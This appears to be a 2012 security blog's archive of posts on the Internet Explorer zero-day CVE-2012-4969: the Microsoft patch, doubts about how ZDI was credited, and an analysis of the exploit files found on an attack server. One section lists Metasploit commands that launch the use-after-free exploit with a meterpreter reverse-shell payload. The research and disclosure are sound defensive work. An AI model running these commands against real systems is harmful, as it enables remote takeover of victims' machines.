Tag Archives: Microsoft

Microsoft Internet Explorer 0Day reported by ZDI to Microsoft ?

As you may know Microsoft has release MS12-063 out-of-band security bulletin, how fix 5 security vulnerabilities including CVE-2012-4969, the Internet Explorer 0day I discovered exploited in the wild by the Nitro gang last weekend.

After analyzing MS12-063 and all the vulnerabilities fixed in this bulletin, I was surprised to see that CVE-2012-4969 was credited to an anonymous researcher, working with TippingPoint’s Zero Day Initiative.

Microsoft thanks the following for working with us to help protect customers: An anonymous researcher, working with TippingPoint’s Zero Day Initiative, for reporting the execCommand Use After Free Vulnerability (CVE-2012-4969)

So, to be clear, this means that this vulnerability was discovered by another researcher, previously to my discovery, reported to ZDI, which then reported it to Microsoft. Hum… Microsoft didn’t yet provide the ZDI reference and ZDI also don’t has communicate around it.

Based on NIST NVD, CVE-2012-4969, has a CVSS base score of 9.3, cause “AccessComplexity” score is set to “Medium“. But really I think that the “AccessComplexity” should be set to “Low” how result then to a CVSS base score of 10.

If you take a look at all Microsoft ZDI upcoming advisories, all related ZDI-CAN, reported by an anonymous researcher, have a maximum CVSS base score of 7.5.

Here under all ZDI CAN’s, reported by an anonymous researcher:

  • ZDI-CAN-1586 was reported the 2012-07-24, with CVSS of 7.5
  • ZDI-CAN-1574 was reported the 2012-07-24, with CVSS of 7.5
  • ZDI-CAN-1373 was reported the 2012-07-24, with CVSS of 7.5
  • ZDI-CAN-1526 was reported the 2012-03-14, with CVSS of 7.5
  • ZDI-CAN-1525 was reported the 2012-03-14, with CVSS of 7.5
  • ZDI-CAN-1524 was reported the 2012-03-14, with CVSS of 7.5
  • ZDI-CAN-1523 was reported the 2012-03-14, with CVSS of 7.5
  • ZDI-CAN-1520 was reported the 2012-03-14, with CVSS of 7.5
  • ZDI-CAN-1402 was reported the 2011-11-29, with CVSS of 7.5
  • ZDI-CAN-1281 was reported the 2011-05-25, with CVSS of 7.5

None of these ZDI CAN vulnerabilities have a CVSS base score of 9.3 or 10. But maybe ZDI doesn’t apply good practices to CVSS scoring ?

If you take a look at the MS12-063 CVE’s assignment, reported by anonymous researchers working with ZDI:

  • CVE-2012-4969, the one, was assigned the 2012-09-18
  • CVE-2012-2557 was assigned the 2012-05-09
  • CVE-2012-1529 was assigned the 2012-03-08

If CVE-2012-4969 was reported to ZDI, by an anonymous researcher, the vulnerability was known by Microsoft since minimum 1 month, a maximum of 462 days, an average time of 168,4 days…

You may know that ZDI (HP related company), is using the reported vulnerabilities, to create IPS filters in order to protect the HP Digital Vaccine customers. So despite the vulnerability affected vendor has not yet release a patch, HP Digital Vaccine customers are “protected” against the potential threat. So, all the potential 0days, reported to ZDI, are modeled as filters.

Our security research team develops new Digital Vaccine® protection filters that address the latest vulnerabilities and are constantly distributed to our customers’ intrusion prevention systems.

You may also know, that ZDI is a part of the zero day exploit market, and that the principal objective of this market is to do money by selling 0days to interested persons or organizations.

Now, just jump back at the end of August, you remember the Java 0day how was also exploited in the wild by the Nitro gang ? Take a look at the Oracle Security Alert for CVE-2012-4681, how is credited ? James Forshaw (tyranid) via TippingPoint. Hum… One more time TippingPoint is present, coincidence ?

An interesting Guardian newspaper article, regarding the Java 0day, was pointing the possible fact that:

Although little is known about the group, it is thought that they did not discover the flaw themselves but may have bought it from a commercial group that specialises in selling details about “zero-day” flaws in software that can be used to penetrate commercial or government systems, even when they have the most up-to-date cybersecurity in place.

This begin to make to much coincidences, I would like to know if:

  • The Microsoft credit is an error ?
  • Has ZDI sold these 0days ?
  • Have HP Digital Vaccine filters been reversed ?
  • Is ZDI victim of a leak ?
  • Is ZDI victim of an internal threat? Lot of ZDI employes have left the company recently.

Updates

09/22:

Robert Graham @ErrataRob has write an interesting article “0-day leaks from IPS” regarding my question “Have HP Digital Vaccine filters been reversed ?“.

MS12-063 Out-of-Band Microsoft Security Update for Internet Explorer Fix 0day

Microsoft has release, the 21 September 2012, as planned in his “Microsoft Security Bulletin Advance Notification for September 2012“, one security bulletin MS12-063 in order to fix multiple 5 security vulnerabilities, including the 0day vulnerability I discovered last week-end.

MS12-063 bulletin is classified as Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers.

CVE-2012-1529 has an unknown CVSS base score and was discovered and privately reported by an anonymous researcher, working with VeriSign iDefense Labs. CVE number was assigned the 2012-03-08.

CVE-2012-2546 has an unknown CVSS base score and was discovered and privately reported by Rosario Valotta. CVE number was assigned the 2012-05-09.

CVE-2012-2548 has an unknown CVSS base score and was discovered and privately reported by Stephen Fewer of Harmony Security, working with TippingPoint’s Zero Day Initiative. CVE number was assigned the 2012-05-09.

CVE-2012-2557 has an unknown CVSS base score and was discovered and privately reported by an anonymous researcher, working with TippingPoint’s Zero Day Initiative. CVE number was assigned the 2012-05-09.

CVE-2012-4969 has a CVSS base score of 9.3 and was discovered and privately reported, regarding Microsoft, by an anonymous researcher, working with TippingPoint’s Zero Day Initiative and to Mitre. CVE number was assigned the 2012-09-18. Something is wrong with this credit, I will write another blog post regarding this story.

I advise you to update as soon as possible.

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17

PoC provided by :

unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Affected version(s) :

IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Zero-Day Season Is Really Not Over Yet

I can confirm, the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually exploited in the wild.

First I would like to thanks the nice people (@binjo@_sinn3r and all the guys of the Metasploit IRC channel on freenode) how helped me to understand and go further in my investigations.

Second, I would like to clarify some points:

  • I wasn’t a target of the 0day, I tested it on my lab. This misunderstanding has been introduced by Reuters in their press release.
  • I did these researches on my personal time, and these researches are not linked with my professional activities. This misunderstanding has been introduced by Reuters in their press release.
  • I don’t pin the responsibility on the Nitro gang, if you read my blog post, you will see that I found coincidences.
  • I don’t know the timeline of the vulnerability, including when it was discovered and how long it has been exploited.

Since the release of the Java SE 7 0day I was monitoring some of the infected servers used by the alleged Nitro gang (take a look at the updates at the end of the blog post). The 14th September morning, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).

As seen in the following screenshot, 4 files were hosted in this folder, and as a curious man, I downloaded everything to see what was related to these files.

I tested these files on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Surprise they dropped files on my test computer (See demonstration video here under) ! A new 0day ?  I decide then to take a deeper look at the grabbed files.

exploit.html

This file is recognized as an HTML file, and catched by 0 anti-viruses on VirusTotal (9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5).

exploit.html” is the entry point of the attack. This file creates an array of “img” and load “Moh2010.swf” Flash file.

Moh2010.swf

This file is recognized as a Macromedia Flash Player movie, and catched by 0 anti-viruses on VirusTotal (70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125).

You can observe that the file is packed by DoSWF and that it is decompress in the memory. After decompression “Moh2010.swf” file is spraying the heap and eval an iframe to “Protect.html” file.

The ActionScript embedded in the original packed SWF file, is also interesting, you will see some special encoding (Chinese ?).

Decoded SWF file, is known as “Exploit:SWF/CVE-2010-2884.B”, or “SWF:Dropper” on VirusTotal (dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f) and detected only by 3/34 anti-viruses. Thanks to binjo.

This file, during exploitation is also checking if the web site is present in Flash Website Storage Settings pannel to no more load the “Protect.html” file. This mean, that once infected the user will no more be exploited despite further visites to the web site.

Display on the first visit

Characters displayed on the first visit

Display on successful exploitation

Display on successfull exploitation

Display on further visits

Protect.html

This file is recognized as an HTML file, and catched by 0 anti-viruses on VirusTotal (2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265).

If you take a look at the source code, you can see interesting javascript code, how is manipulating the “img” array created by “exploit.html“.

You will also see that tests are done, in order to target Windows XP 32-bit and Internet Explorer 7 or 8.

111.exe

This file is recognized as a Autodesk FLIC image file, and catched by 0 anti-viruses on VirusTotal (a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9).

Submitted to Malware Tracker (baabd0b871095138269cf2c53b517927), this file look like suspicious and require further investigations. “111.exe” is packed and after decoding the file is still not detected by any anti-virus on VirusTotal (a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812). But with a Malwr analysis, you can see that this file is recognized as installing a program to run automatically at logon.

Conclusion

The guys how developed this new 0day were not happy to have been catched, they just removed all the files from the source server 2 days after my discovery. But also more interesting the also removed a Java 0day variant from other folders.

Also I submitted all these stuff to different person in order to confirm the strangeness of this exploit, and we got some good return.

Updates

Sunday 09/16:

Metasploit team is planning to release an exploit module on Monday. This module seems to work very well.

Monday 09/17:

Metasploit has release an exploit module “ie_execcommand_uaf and this module is working for IE 7/8/9 on XP/Vista/7.

AlienVault Labs has provide some additional information s regarding DoSWF file and the C&C server aka “12.163.32.15“.

Microsoft has release MSA-2757760 and recommend to install EMET (Enhanced Mitigation Experience Toolkit) 3.0 and other mitigation solutions.

Tuesday 09/18:

AlienVault Labs has provide more details on the potential source of the attack.

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

Wednesday 09/19:

AlienVault Labs has report variant of the “Protect.html” file, named “Dodge.html” how is now also infecting Windows 7 32 bits running Java6 with Internet Explorer 9, and confirm the usage of the 0day in targeted attacks.

Microsoft propose a Fix it KB2757760 solution, “Prevent Memory Corruption via ExecCommand in Internet Explorer“, that prevents exploitation of this issue.

Microsoft has publish an advanced notification “Microsoft Security Bulletin Advance Notification for September 2012” for one out-of-band security bulletin that Microsoft is intending to release on September 21, 2012. The bulletin will addresses security vulnerabilities in Internet Explorer. The vulnerability is also affecting Internet Explorer on Windows Server 2003 and 2008.

Friday 09/21:

Microsoft has release the promised update MS12-063 in order to fix the 0day vulnerability. If you use Internet Explorer, I advice you to update as soon as possible !